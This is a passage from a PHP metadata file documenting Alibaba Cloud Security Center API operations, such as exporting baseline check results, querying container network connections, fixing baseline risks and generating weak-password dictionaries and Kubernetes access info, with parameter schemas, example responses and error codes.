.'* **1**: yes'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'StrategyId', 'in' => 'query', 'schema' => ['description' => 'The ID of the baseline check policy.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '12', 'title' => ''], ], [ 'name' => 'RiskIds', 'in' => 'query', 'schema' => ['description' => 'The ID of the risk item in the baseline check results. Separate multiple IDs with commas (,).'."\n", 'type' => 'string', 'required' => false, 'example' => '123,124', 'title' => ''], ], [ 'name' => 'ExportType', 'in' => 'query', 'schema' => ['description' => 'The type of the export task. Set the value to **hc_check_warning**, which indicates tasks to export baseline check results.'."\n", 'type' => 'string', 'required' => false, 'example' => 'hc_check_warning', 'title' => ''], ], [ 'name' => 'IsCleartextPwd', 'in' => 'query', 'schema' => ['description' => 'The export method of the results for the weak password baseline check. Valid values:'."\n" ."\n" .'* **0**: exports the check results after it is masked.'."\n" .'* **1**: exports the check results in plaintext.'."\n", 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '0', 'title' => ''], ], [ 'name' => 'GroupId', 'in' => 'query', 'schema' => ['description' => 'The ID of the server group.'."\n" ."\n" .'> You can call the [DescribeAllGroups](~~DescribeAllGroups~~) operation to query the IDs of server groups.'."\n", 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '13007754', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'A7FC828B-C242-1005-9736-C7CC5DC09FF0', 'title' => ''], 'FileName' => ['description' => 'The name of the file that contains exported baseline check results.'."\n", 'type' => 'string', 'example' => 'health_check_export_20220407', 'title' => ''], 'Id' => ['description' => 'The ID of the task to export baseline check results.'."\n" ."\n" .'> You can call use the value of this parameter to call the [DescribeHcExportInfo](~~DescribeHcExportInfo~~) operation to query the export progress.'."\n", 'type' => 'integer', 'format' => 'int64', 'example' => '439316', 'title' => ''], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'FreeVersionNotPermit', 'errorMessage' => 'Free version is not permitted.', 'description' => ''], ['errorCode' => 'ExportRecordNotFound', 'errorMessage' => 'No risk entries found for export.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => [ 'substitutions' => ['Sas::2018-12-03::ExportRecord'], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'responseDemo' => '[{"type":"json","example":"{\\n \\"RequestId\\": \\"A7FC828B-C242-1005-9736-C7CC5DC09FF0\\",\\n \\"FileName\\": \\"health_check_export_20220407\\",\\n \\"Id\\": 439316\\n}","errorExample":""},{"type":"xml","example":"\\n A7FC828B-C242-1005-9736-C7CC5DC09FF0\\n health_check_export_20220407\\n 439316\\n","errorExample":""}]', 'title' => 'ExportWarning', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ExportWarning'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:ExportWarning', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'FindContainerNetworkConnect' => [ 'summary' => 'Retrieves information about network connectivity between two nodes.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'none'], 'parameters' => [ [ 'name' => 'CriteriaType', 'in' => 'query', 'schema' => ['description' => 'The query type of the element to query. Valid values:'."\n" ."\n" .'- **EDGE**: connection information.', 'type' => 'string', 'required' => false, 'example' => 'EDGE', 'title' => ''], ], [ 'name' => 'StartTime', 'in' => 'query', 'schema' => ['description' => 'The start time of the network connectivity.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1666886400000', 'title' => ''], ], [ 'name' => 'EndTime', 'in' => 'query', 'schema' => ['description' => 'The end time of the network connectivity.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1649260799999', 'title' => ''], ], [ 'name' => 'SrcNode', 'in' => 'query', 'style' => 'json', 'schema' => [ 'description' => 'The source node information, which is used to filter source nodes.', 'type' => 'object', 'properties' => [ 'NodeType' => ['description' => 'The node type. Valid values:'."\n" .'- **app**: application. The node type is application.', 'type' => 'string', 'required' => false, 'example' => 'app', 'title' => ''], 'ClusterId' => ['description' => 'The ID of the container cluster to query.'."\n" .'> You can call the [DescribeGroupedContainerInstances](~~DescribeGroupedContainerInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'c56xxx1775dea0', 'title' => ''], 'Namespace' => ['description' => 'The namespace of the cluster.', 'type' => 'string', 'required' => false, 'example' => 'default', 'title' => ''], 'AppName' => ['description' => 'The name of the container application.', 'type' => 'string', 'required' => false, 'example' => 'arms-prometheus-ack-arms-prometheus', 'title' => ''], 'PodName' => ['description' => 'The name of the pod.', 'type' => 'string', 'required' => false, 'example' => 'abc-deployment-yacs-31144-39265-1384966-7f8c8cd578-h6mhb', 'title' => ''], 'NodeIds' => [ 'description' => 'The list of node IDs.', 'type' => 'array', 'items' => ['description' => 'The node ID.', 'type' => 'string', 'required' => false, 'example' => '1001', 'title' => ''], 'required' => false, 'title' => '', 'example' => '', ], ], 'required' => false, 'title' => '', 'example' => '', ], ], [ 'name' => 'DstNode', 'in' => 'query', 'style' => 'json', 'schema' => [ 'description' => 'The destination node information, which is used to filter destination nodes.', 'type' => 'object', 'properties' => [ 'NodeType' => ['description' => 'The node type. Valid values:'."\n" .'- **app**: application. The node type is application.', 'type' => 'string', 'required' => false, 'example' => 'app', 'title' => ''], 'ClusterId' => ['description' => 'The ID of the container cluster to query.'."\n" .'> You can call the [DescribeGroupedContainerInstances](~~DescribeGroupedContainerInstances~~) operation to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => 'f5x833820xx', 'title' => ''], 'Namespace' => ['description' => 'The namespace of the cluster.', 'type' => 'string', 'required' => false, 'example' => 'default', 'title' => ''], 'AppName' => ['description' => 'The name of the container application.', 'type' => 'string', 'required' => false, 'example' => 'nginx-ingress-controller', 'title' => ''], 'PodName' => ['description' => 'The name of the pod.', 'type' => 'string', 'required' => false, 'example' => 'abc-deployment-yacs-31144-39265-1384966-7f8c8cd578-h6mhb', 'title' => ''], 'NodeIds' => [ 'description' => 'The list of node IDs.', 'type' => 'array', 'items' => ['description' => 'The node ID.', 'type' => 'string', 'required' => false, 'example' => '1001', 'title' => ''], 'required' => false, 'title' => '', 'example' => '', ], ], 'required' => false, 'title' => '', 'example' => '', ], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page in a paged query. Default value: 20. If the PageSize parameter is left empty, 20 entries are returned by default.'."\n" .'> Do not leave PageSize empty.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return. Default value: **1**, which indicates that the first page is returned.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'title' => '', 'description' => 'The response object.', 'type' => 'object', 'properties' => [ 'RequestId' => ['title' => '', 'description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '8686CE6E-9BFA-5436-A9D9-77B984AEE7F8'], 'Connects' => [ 'description' => 'The network connectivity information.', 'type' => 'array', 'items' => [ 'description' => 'The network connectivity information.', 'type' => 'object', 'properties' => [ 'Id' => ['description' => 'The network connectivity ID.', 'type' => 'integer', 'format' => 'int64', 'example' => '1458', 'title' => ''], 'FirstTime' => ['description' => 'The timestamp when the connection first occurred. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1636077279174', 'title' => ''], 'LastTime' => ['description' => 'The timestamp when the connection most recently occurred. Unit: milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1636595679174', 'title' => ''], 'SrcIp' => ['description' => 'The source IP address.', 'type' => 'string', 'example' => '35.233.62.116', 'title' => ''], 'SrcPort' => ['description' => 'The source port number.', 'type' => 'string', 'example' => '10240', 'title' => ''], 'DstIp' => ['description' => 'The destination IP address.', 'type' => 'string', 'example' => '172.20.62.176', 'title' => ''], 'DstPort' => ['description' => 'The destination port.', 'type' => 'string', 'example' => '443', 'title' => ''], 'SrcContainer' => [ 'description' => 'The source container information.'."\n" .'>This parameter is not supported.>.', 'type' => 'object', 'properties' => [ 'ContainerId' => ['description' => 'The container ID.', 'type' => 'string', 'example' => '48a6xxx5709d5a5866', 'title' => ''], ], 'title' => '', 'example' => '', ], 'DstContainer' => [ 'description' => 'The destination container information.'."\n" ."\n" .'>This parameter is not supported.>.', 'type' => 'object', 'properties' => [ 'ContainerId' => ['description' => 'The container ID.', 'type' => 'string', 'example' => '48a6dxxx9d5a5866', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The paging information for the query.', 'type' => 'object', 'properties' => [ 'TotalCount' => ['description' => 'The total number of connections returned.', 'type' => 'integer', 'format' => 'int64', 'example' => '12', 'title' => ''], 'Count' => ['description' => 'The number of entries returned on the current page in the paging query.', 'type' => 'integer', 'format' => 'int64', 'example' => '10', 'title' => ''], 'PageSize' => ['description' => 'The number of entries per page in the paging query. Default value: **20**, which indicates that 20 network connectivity entries are displayed per page.', 'type' => 'integer', 'format' => 'int64', 'example' => '20', 'title' => ''], 'CurrentPage' => ['description' => 'The current page number in the paging query.', 'type' => 'integer', 'format' => 'int64', 'example' => '1', 'title' => ''], ], 'title' => '', 'example' => '', ], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query container network connectivity information', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'FindContainerNetworkConnect'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:ListContainerNetworkConnect', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"8686CE6E-9BFA-5436-A9D9-77B984AEE7F8\\",\\n \\"Connects\\": [\\n {\\n \\"Id\\": 1458,\\n \\"FirstTime\\": 1636077279174,\\n \\"LastTime\\": 1636595679174,\\n \\"SrcIp\\": \\"35.233.62.116\\",\\n \\"SrcPort\\": \\"10240\\",\\n \\"DstIp\\": \\"172.20.62.176\\",\\n \\"DstPort\\": \\"443\\",\\n \\"SrcContainer\\": {\\n \\"ContainerId\\": \\"48a6xxx5709d5a5866\\"\\n },\\n \\"DstContainer\\": {\\n \\"ContainerId\\": \\"48a6dxxx9d5a5866\\"\\n }\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"TotalCount\\": 12,\\n \\"Count\\": 10,\\n \\"PageSize\\": 20,\\n \\"CurrentPage\\": 1\\n }\\n}","type":"json"}]', ], 'FinishGuidTask' => [ 'summary' => 'Completes guidance tasks for beginners to earn rewards.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'none', 'abilityTreeCode' => '119460', 'abilityTreeNodes' => ['FEATUREsasJODUMM'], 'tenantRelevance' => 'publicInformation', ], 'parameters' => [ [ 'name' => 'TaskTypeName', 'in' => 'query', 'schema' => ['description' => 'The name of the task type.'."\n", 'type' => 'string', 'required' => true, 'example' => 'guide_sub_task_config_add_collection', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.', 'type' => 'string', 'example' => '08DCAABC-82E7-5EF5-A9E7-A82DC07C****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'eventInfo' => [ 'enable' => false, 'eventNames' => [], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"08DCAABC-82E7-5EF5-A9E7-A82DC07C****\\"\\n}","type":"json"}]', 'title' => 'FinishGuidTask', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'FinishGuidTask'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:FinishGuidTask', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'FixCheckWarnings' => [ 'summary' => 'Fixes baseline check risk items.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'none', 'riskType' => 'high', 'chargeType' => 'paid', 'abilityTreeCode' => '92285', 'abilityTreeNodes' => ['FEATUREsas0XJWFD'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source.', 'type' => 'string', 'required' => false, 'example' => '165.225.XX.XX', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Valid values:'."\n" .'- **zh**: Chinese.'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'RiskId', 'in' => 'query', 'schema' => ['description' => 'The ID of the risk item.'."\n" ."\n" .'> To query the check item information for a specified risk item and a specified server, you must provide the risk item ID. You can call the [DescribeCheckWarningSummary](~~DescribeCheckWarningSummary~~) operation to obtain the ID.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '10354', 'title' => ''], ], [ 'name' => 'CheckParams', 'in' => 'query', 'schema' => ['description' => 'The parameters of the baseline check items to fix. The following parameters are included:'."\n" .'- **checkId**: The ID of the check item.'."\n" .'- **rules**: The fix rules (in array format).'."\n" .' - **value**: Specifies whether the fix method is selected. Valid values: **0** (not selected), **1** (selected).'."\n" .' - **ruleId**: The ID of the fix method.'."\n" .' - **paramList**: The list of fix methods (in array format). '."\n" .' • **paramName**: The name of the fix method. '."\n" .' • **value**: The value of the fix method.', 'type' => 'string', 'required' => true, 'example' => '[{"checkId":8,"rules":[{"ruleId":"rule.ssh_Idle.interval","value":1,"paramList":[{"paramName":"range_val","value":"600"},{"paramName":"range_val","value":"600"}]},{"ruleId":"rule.ssh_Idle.count","value":1,"paramList":[{"paramName":"range_val","value":"3"}]}]}]', 'title' => ''], ], [ 'name' => 'Uuids', 'in' => 'query', 'schema' => ['description' => 'The unique ID of the asset instance to fix. You can call the [DescribeWarningMachines](~~DescribeWarningMachines~~) operation to obtain the ID.', 'type' => 'string', 'required' => false, 'example' => '75a417dda5f25edb5bed8f208a9a****,c7e10fd794262a1510d5648f9e5d****', 'title' => ''], ], [ 'name' => 'SnapshotName', 'in' => 'query', 'schema' => ['description' => 'The name of the snapshot to create when performing the baseline fix operation.', 'type' => 'string', 'required' => false, 'example' => 'sas_fix_2024-12-04', 'title' => ''], ], [ 'name' => 'RetentionDays', 'in' => 'query', 'schema' => ['description' => 'The retention period of the snapshot to create when performing the baseline fix operation. Valid values: 1 to 365. Unit: days.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'BatchId' => ['description' => 'The ID of the batch fix task for risk items.', 'type' => 'integer', 'format' => 'int64', 'example' => '52370', 'title' => ''], 'RequestId' => ['description' => 'The request ID.', 'type' => 'string', 'example' => '76C1D7FD-DB1E-45EA-B804-3FBD9A1DD9C0', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => 'ConsoleError', 'errorMessage' => 'The error message is %s %s.', 'description' => ''], ['errorCode' => 'HCClientOffline', 'errorMessage' => 'Client is offline.', 'description' => ''], ['errorCode' => 'InvalidBind', 'errorMessage' => 'Asset not bind.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Fix baseline check risk items', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'FixCheckWarnings'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'none', 'ramAction' => [ 'action' => 'yundun-sas:FixCheckWarnings', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"BatchId\\": 52370,\\n \\"RequestId\\": \\"76C1D7FD-DB1E-45EA-B804-3FBD9A1DD9C0\\"\\n}","type":"json"}]', ], 'GenerateClusterScannerWebhookYaml' => [ 'summary' => 'Generate K8s cluster scan access configuration.', 'methods' => ['post', 'get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas8WIQPJ'], ], 'parameters' => [ [ 'name' => 'ClusterId', 'in' => 'query', 'schema' => ['description' => 'The ID of the container cluster.'."\n" .'> You can call the [DescribeGroupedContainerInstances](~~DescribeGroupedContainerInstances~~) API to obtain this parameter from the ClusterId field.', 'type' => 'string', 'required' => true, 'example' => 'c3aaf6c8085f84791882eef200cd2****', 'title' => ''], ], [ 'name' => 'WebhookOpen', 'in' => 'query', 'schema' => ['description' => 'Indicates whether the incremental scan switch is enabled. Values:'."\n" .'- **0**: Not enabled'."\n" .'- **1**: Enabled', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the current request, which is a unique identifier generated by Alibaba Cloud for this request and can be used for troubleshooting and problem localization.', 'type' => 'string', 'example' => 'BE120DAB-F4E7-4C53-ADC3-A97578ABF384', 'title' => ''], 'ClusterId' => ['description' => 'The ID of the container cluster.', 'type' => 'string', 'example' => 'c471f0f61b9c04f8380556e922cf1****', 'title' => ''], 'Id' => ['description' => 'Unique identifier.', 'type' => 'integer', 'format' => 'int64', 'example' => '131231', 'title' => ''], 'WebhookOpen' => ['description' => 'Indicates whether the incremental scan switch is enabled.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"BE120DAB-F4E7-4C53-ADC3-A97578ABF384\\",\\n \\"ClusterId\\": \\"c471f0f61b9c04f8380556e922cf1****\\",\\n \\"Id\\": 131231,\\n \\"WebhookOpen\\": 1\\n}","type":"json"}]', 'title' => 'Generate Cluster Scanner Component Access Configuration', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GenerateClusterScannerWebhookYaml'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:GenerateClusterScannerWebhookYaml', 'authLevel' => 'resource', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'ClusterScannerYaml', 'arn' => 'acs:yundun-sas:{#regionId}:{#accountId}:clusterscanneryaml/*'], ], ], ], ], ], 'GenerateDynamicDict' => [ 'summary' => 'Generates a custom dictionary of weak passwords for the baseline check feature.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'abilityTreeCode' => '92286', 'abilityTreeNodes' => ['FEATUREsas0XJWFD'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '58.248.XX.XX', 'title' => ''], ], [ 'name' => 'Domains', 'in' => 'query', 'schema' => ['description' => 'The domain name for custom weak passwords.'."\n", 'type' => 'string', 'required' => false, 'example' => 'https://www.aliyun.com', 'title' => ''], ], [ 'name' => 'Names', 'in' => 'query', 'schema' => ['description' => 'The company name for custom weak passwords.'."\n", 'type' => 'string', 'required' => false, 'example' => 'Alibaba', 'title' => ''], ], [ 'name' => 'ArgKeywords', 'in' => 'query', 'schema' => ['description' => 'The keyword of the dictionary.'."\n", 'type' => 'string', 'required' => false, 'example' => 'Admin', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID.'."\n", 'type' => 'string', 'example' => '09969D2C-4FAD-429E-BFBF-9A60DEF8****'."\n", 'title' => ''], 'KeywordList' => [ 'description' => 'The custom weak passwords.'."\n", 'type' => 'array', 'items' => ['description' => 'The information about the custom weak password.'."\n", 'type' => 'string', 'example' => '123456.Alibaba'."\n", 'title' => ''], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => '-101', 'errorMessage' => '%s %s', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"09969D2C-4FAD-429E-BFBF-9A60DEF8****\\\\n\\",\\n \\"KeywordList\\": [\\n \\"123456.Alibaba\\\\n\\"\\n ]\\n}","type":"json"}]', 'title' => 'GenerateDynamicDict', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GenerateDynamicDict'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:GenerateDynamicDict', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'GenerateK8sAccessInfo' => [ 'summary' => 'Generate commands for connecting self-built Kubernetes clusters.', 'methods' => ['get', 'post'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'readAndWrite', 'systemTags' => [ 'operationType' => 'create', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsas60Z3AE'], ], 'parameters' => [ [ 'name' => 'ClusterName', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The name of the Kubernetes cluster.', 'type' => 'string', 'required' => true, 'example' => 'test'], ], [ 'name' => 'GroupId', 'in' => 'query', 'schema' => ['description' => 'The queried group ID.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '11341690', 'title' => ''], ], [ 'name' => 'Vendor', 'in' => 'query', 'schema' => ['description' => 'The cloud asset vendor. Valid values:'."\n" .'- **Tencent**'."\n" .'- **HUAWEICLOUD**'."\n" .'- **Azure**'."\n" .'- **AWS** '."\n" .'- **Other cloud assets**', 'type' => 'string', 'required' => true, 'example' => 'Tencent', 'title' => ''], ], [ 'name' => 'ExpireDate', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The expiration time for container access.', 'type' => 'integer', 'format' => 'int64', 'required' => true, 'example' => '1711951508388'], ], [ 'name' => 'AuditRegionId', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The region of the audit log.', 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou'], ], [ 'name' => 'AuditProject', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The SLS project of the audit log.', 'type' => 'string', 'required' => false, 'example' => 'k8s-log-custom-huxintest1018-2'], ], [ 'name' => 'AuditLogStore', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The SLS Logstore of the audit log.', 'type' => 'string', 'required' => false, 'example' => 'audit-cf6baf6afa106eca665296fdf68b65bf'], ], [ 'name' => 'AliyunYundunGatewayProjectName', 'in' => 'query', 'schema' => ['description' => 'This parameter is deprecated and does not need to be specified.', 'type' => 'string', 'required' => false, 'default' => 'Sas', 'example' => 'None', 'title' => ''], ], [ 'name' => 'AliyunYundunGatewayApiName', 'in' => 'query', 'schema' => ['description' => 'This parameter is deprecated and does not need to be specified.', 'type' => 'string', 'default' => 'GenerateK8sAccessInfo', 'required' => false, 'example' => 'None', 'title' => ''], ], [ 'name' => 'AliyunYundunGatewayPopName', 'in' => 'query', 'schema' => ['description' => 'This parameter is deprecated and does not need to be specified.', 'type' => 'string', 'default' => 'Sas.2018-12-03.GenerateK8sAccessInfo', 'required' => false, 'example' => 'None', 'title' => ''], ], [ 'name' => 'CpuArch', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The CPU architecture, which can be ARM or x86.', 'type' => 'string', 'required' => false, 'example' => 'arm'], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The unique identifier that Alibaba Cloud generates for the request.', 'type' => 'string', 'example' => '061955B2-BC40-589F-AF63-C40A901EE279', 'title' => ''], 'Data' => [ 'description' => 'The returned data.', 'type' => 'object', 'properties' => [ 'ClusterName' => ['title' => '', 'description' => 'The cluster name.', 'type' => 'string', 'example' => 'test'], 'AliUid' => ['title' => '', 'description' => 'The aliuid of the user.', 'type' => 'integer', 'format' => 'int64', 'example' => '1766185894104***'], 'InstallKey' => [ 'title' => '', 'description' => 'The installation key of the server.', 'enumValueTitles' => [], 'type' => 'string', 'example' => 'BC66185***', ], 'ClusterId' => ['title' => '', 'description' => 'The cluster ID.', 'type' => 'string', 'example' => 'c8ca91e0907d94efaba7fb0827eb9****'], 'GroupId' => ['title' => '', 'description' => 'The server group ID.', 'type' => 'string', 'example' => '11618788'], 'ExpireDate' => ['title' => '', 'description' => 'The expiration time, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1804230578566'], 'AuditRegionId' => ['title' => '', 'description' => 'The region ID of the server.', 'type' => 'string', 'example' => 'cn-hangzhou'], 'AuditProject' => ['title' => '', 'description' => 'The SLS project of the audit log.', 'type' => 'string', 'example' => 'k8s-log-custom-your-project-sd89ehaaa'], 'AuditLogStore' => ['title' => '', 'description' => 'The SLS Logstore of the audit log.', 'type' => 'string', 'example' => 'audit-cf6baf6afa106eca665296fdf68b65bf'], 'CpuArch' => ['title' => '', 'description' => 'The CPU architecture, which can be ARM or x86. Valid values:'."\n" .'- arm64'."\n" ."\n" .'- x86', 'type' => 'string', 'example' => 'x86'."\n"], ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 400 => [ ['errorCode' => '-101', 'errorMessage' => 'Invalid parameter value.', 'description' => ''], ], 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Generate commands for connecting self-built Kubernetes clusters', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'GenerateK8sAccessInfo'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'create', 'ramAction' => [ 'action' => 'yundun-sas:GenerateK8sAccessInfo', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ 